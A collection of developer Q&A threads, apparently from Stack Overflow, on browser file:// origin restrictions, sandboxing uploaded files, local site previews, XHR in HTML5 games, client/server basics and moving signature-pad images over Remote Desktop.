Why can't a local page like
file:///C:/index.html
Send a request for a resource
file:///C:/data.json
This is prevented because it's a cross origin request, but in what way is that cross origin? I don't understand why this is a vulnerability / prevented. It just seems like a massive pain when I want to whip up a quick utility for something in JavaScript/HTML and I can't run it without uploading to to a server somewhere because of this seemingly arbitrary restriction.
HTML files are expected to be "safe". Tricking people into saving an HTML document to their hard drive and then opening it is not difficult (Here, just open the HTML file attached to this email would cause many email clients to automatically safe it to a tmp directory and open it in the default application).
If JavaScript in that file had permission to read any file on the disk, then users would be extremely vulnerable.
It's the same reason that software like Microsoft Word prompts before allowing macros to run.
It protects you from malicious HTML files reading from your hard drive.
On a real server, you are (hopefully) not serving arbitrary files, but on your local machine, you could very easily trick users into loading whatever you want.
Browsers are set up with security measures to make sure that ordinary users won't be at increased risk. Imagine that I'm a malicious website and I have you download something to your filesystem that looks, to you, like a regular website. Imagine that downloaded HTML can access other parts of your file system and then send that data to me through AJAX or perhaps another piece of executable code on the filesystem that came with this package. To a regular user this might look like a regular website that just "opened up a little weird but I still got it to work." If the browser prevents that, they're safer.
It's possible to turn these flags off (as in here: How to launch html using Chrome at "--allow-file-access-from-files" mode?), but that's more for knowledgeable users ("power users"), and probably comes with some kind of warning about how your browsing session isn't secure.
For the kind of scenarios you're talking about, you should be able to spin up a local HTTP server of some sort - perhaps using Python, Ruby, or node.js (I imagine node.js would be an attractive option for testing javascript base apps).
Related
Mozilla Development Network recommends sandboxing uploaded files to a different subdomain:
Sandbox uploaded files (store them on a different server and allow
access to the file only through a different subdomain or even better
through a fully different domain name).
I don't understand what additional security this would provide; my approach has been to upload files on the same domain as the web page with the <input> form control, restrict uploaded files to a particular directory and perform antivirus scans on them, and then allow access to them on the same domain they were uploaded to.
There's practical/performance reasons and security reasons.
From a practical/performance reason, unless you are on a budget, store your files on a system optimised for performance. This can be any type of CDN if you are serving them once uploaded, or just isolated upload-only servers. You can do this yourself, or better off you can use something like AWS S3 and customise the permissions to your needs.
From a security point of view, it is incredibly hard to protect an uploaded file from being executable, specially if you are using a server side scripting language. There are many methods, both in HTTP and in the most popular HTTP servers (nginx, apache, ...) to harden things and make them secure, but there is so many things that you have to take into account and another bunch that you would never even think about, that it is much safer to just leave your files somewhere else altogether, ideally where there's no scripting engine that could run script code on them.
I assume that the different subdomain or domain recommendation is about XSS, vulns exploiting bad configurations of CORS, prevention on phishing attempts (like someone successfully uploading content to your site that mimics your site but does something nasty such as stealing user credentials or providing fake information, and the site would still be served from your domain and there wouldn't be an https security alert from the certificate either).
Found an interesting article about "Cruftless" links (removing the "index.html" from links) but when I do that no browser shows the local pages.
http://www.nimblehost.com/blog/2012/11/why-cruftless-links-are-better/,
This is understandable, it's a 'file' url from a local machine, so what do people do to work on basic html sites offline? How do they preview them?
For example, no browser (understandably) will display this...
file:///JOBS/ABC/About/
... but this is fine...
file:///JOBS/ABC/About/index.html
?... so what do people do to get around this?
The meaning of file: URLs is, by definition, system-dependent. Normally browsers map them to files in the file system in a relatively straightforward manner.
Thus, a link with href value like file:///JOBS/ABC/About/ may or may not work, depending on system. It may fail, or it may open a generated document containing a directory (folder) listing, or it might do something else.
There is normally no need to get around this, and it is pointless to worry about SEO when dealing with local files.
This could, however, matter during site development when you work with a site locally (and perhaps test and demonstrate it locally). Then you might wish to have, say, About us so that it works locally as well as on a server, yielding About/index.html in both cases but without hard-wiring index.html in HTML markup.
I’m afraid the answer is “you can’t”. But as a workaound, you can install and use a local HTTP server, with settings similar to those that you will have on the real server. This means a little extra work (mainly downloading and installing and configuring software like XAMPP), but it also gives you important other benefits, like testing your pages locally with server-based features (to the extent that the real server is similar to the local server).
I am currently developing a HTML5 game which loads in an external resource. Currently, I am using XMLHttpRequest to read in the file, but this does not work on Chrome, resulting in a
XMLHttpRequest cannot load file:///E:/game/data.txt
Cross origin requests are only supported for HTTP.
The file is in the same directory as the HTML5 file.
Questions:
Is there any way for a HTML5 application to use XMLHttpRequest (or
other method) to load in an external file without requiring it to be
hosted on a webserver?
If I package the HTML5 code as an application on a tablet/phone
which supports HTML5, would XMLHttpRequest be able to load external
files?
(a) Yes and no. As a matter of security-policy, XHR has traditionally been both same-protocol (ie: http://, rather than file:///), and on top of that, has traditionally been same-domain, as well (as in same subdomain -- http://pages.site.com/index can't get a file from http://scripts.site.com/). Cross-domain requests are now available, but they require a webserver, regardless, and the server hosting the file has to accept the request specifically.
(b) So in a roundabout way, the answer is yes, some implementations might (incorrectly) allow you to grab a file through XHR, even if the page is speaking in file-system terms, rather than http requests (older versions of browsers)... ...but otherwise you're going to need a webserver of one kind or another. The good news is that they're dirt-simple to install. EasyPHP would be sufficient, and it's pretty much a 3-click solution. There are countless others as well. It's just the first that comes to mind in terms of brain-off installation, if all you want is a file-server in apache, and you aren't planning on using a server-side scripting language (or if you do plan on using PHP).
XMLHttpRequest would absolutely be able to get external files...
IF they're actually external (ie: not bundled in a phone-specific cache -- use the phone's built-in file-access API for that, and write a wrapper to handle each one with the same, custom interface), AND the phone currently has reception -- be prepared to handle failure-conditions (like having a default-settings object, or having error-handling or whatever the best-case is, for whatever is missing).
Also, look into Application Cache Manifests. Again, this is an html5 solution which different versions of different phones handle differently (early-days versus more standardized formats). DO NOT USE IT DURING DEVELOPMENT, AS IT MAKES TESTING CODE/CONTENT CHANGES MISERABLY SLOW AND PAINFUL, but it's useful when your product is pretty much finished and bug-free, and seconds away from launch, where you tell users' browsers to cache all of the content for eternity, so that they can play offline, and they can save all kinds of bandwidth, not having to download everything the next time they play.
I am new to web programming...I have been asked to create a simple Internet search application which would allow transmit to the browser some data stored remotely in the server.
Considering the client/server architecture (which I am new to) I would like to know if the "client" is represented only by the Internet browser and therefore the entire code of the web application should be stored in the server. As it's a very generic question a generic answer is also well accepted.
As you note, this is a very generic and broad question. You'd be well-served by more complete requirements. Regardless:
Client/server architecture generally means that some work is done by the client, and some by the server. The client may be a custom application (such as iTunes or Outlook), or it might be a web browser. Even if it's a web browser, you typically still have some code executing client-side, Javascript usually, to do things like field validation (are all fields filled out?).
Much of the code, as you note, will be running on the server, and some of this may duplicate your client-side code. Validation, for instance, should be performed on the client-side, to improve performance (no need to communicate with the server to determine if the password meets length requirements), but should be performed on the server as well, since client-side code is easily bypassed.
Either you can put all the code on the server, and have it generate HTML to send back to the browser. Or you can include JavaScript in the HTML pages, so some of the logic runs inside the browser. Many web applications mix the two techniques.
You can do this with all the code stored on the server.
1)The user will navigate to a page on your webserver using an url you provide.
2)When the webserver gets the request for that page, instead of just returning a standard html file, it will run your code, perhaps some PHP, which inserts the server information, perhaps from a database, into a html template.
3) The resulting fully complete html file is sent to the client. To the client's browser, it looks like any other html page.
For an example of PHP the dynamically inserts information into HTML see: (this wont be exactly what you will do but it will give you an idea of how PHP can work)
code:
http://www.php-scripts.com/php_diary/example1.phps
see the result (refresh a few times to see it in action):
http://www.php-scripts.com/php_diary/example1.php3
You can see from this the "code file" looks just like a normal html file, except what is between angled brackets is actually PHP code, in this case it puts the time into the position it is at in the html file, in your case you would write code to pull the data you want into the file.
I have an application that people use through Remote Desktop/Terminal Server. The application supports digital signatures. Well, the digital signature pad is on the client, but the program runs on the server. The signature pad also does not support being shared as a device through Remote Desktop(not listed with "Supported Plug And Play Devices" in local resources).
What is the best way of being able to send the signature to the server from the client machine? Preferably with having the least amount of setup for the users(there are a lot of clients and a fair amount of servers this must be done for)
My best idea so far is sharing the clipboard and using it to send messages from server to client(with the client application "polling" the clipboard for a special clipboard format) I feel like this may not be very fast or stable though as I don't think Remote Desktop was designed for it.
Also, we are open to [reasonable] language choices like C/C++, C#, Delphi(the application is written in this), etc. Also, the signature pad is a Topaz TS460(connects by USB).
Can anyone give me ideas on how this can be done or if the clipboard idea of mine is probably the best?
tl;dr: What is the best way of sending an image from a client to a server through remote desktop?
Update:
Well, I've done a bit of testing with plain ASCII text(I can't get files to transfer) and it seems that there is problems copying large amounts of text. I tried copying 43M of text and after a long period of waiting I just got an empty clipboard(Like it did a paste, but there was no text pasted) I was able to transfer about 2M of data though (at decent speeds) between server and client, so this may be feasible for signature images(which will be either jpeg or png compressed)
Have you looked into using Remote Desktop Virtual Channels? http://msdn.microsoft.com/en-us/library/aa383509(VS.85).aspx
for topaz signature pad and credit card swiper you will need the serial type. It will work, already tried it. but I guess this question is too old for me to answer. Does IPAD as well as well as other tablets work on terminal and citrix setup?
I have not tried with Remote Desktop, but one thing that comes to mind is installing a good macro tool on the client. AutoHotKey ( http://www.autohotkey.com/ ) is a free tool that lets you create runable scripts that can do things like open applications and send key strokes to them.
I'm not sure how well it would work with remote desktop, but I know for certain that you can easily setup a script that would launch an application, send it "key strokes" to generate data, copy the data to the clipboard, switch to another application and then paste in the data.
When AutoHotKey is installed, you have the option of associating the file types of the scripts with the app so that end users could just double click your scripts desktop icon to run it. No command line messyness for them.
If all you need to do is transfer an amount of data (a file) from the client to the server it is fairly easy. Polling for a file seems also more logical as polling via the clipboard.
When you connect the client should enable sharing a harddisk (at least one). You can specify the options every time you connect, or you can send the client a .RDP file that is preconfigured.
If you can get the user to put the file on a fixed position, you can access the file C:\Shared \File.jpg using a path like \tsclient\c\Shared\File.jpg.
Here's an explanation (with nice screenshot) how to copy files with Remote Desktop:
http://www.jakeludington.com/ask_jake/20051218_copying_files_with_remote_desktop.html
I wasn't sure if your question rules already out this approach or not.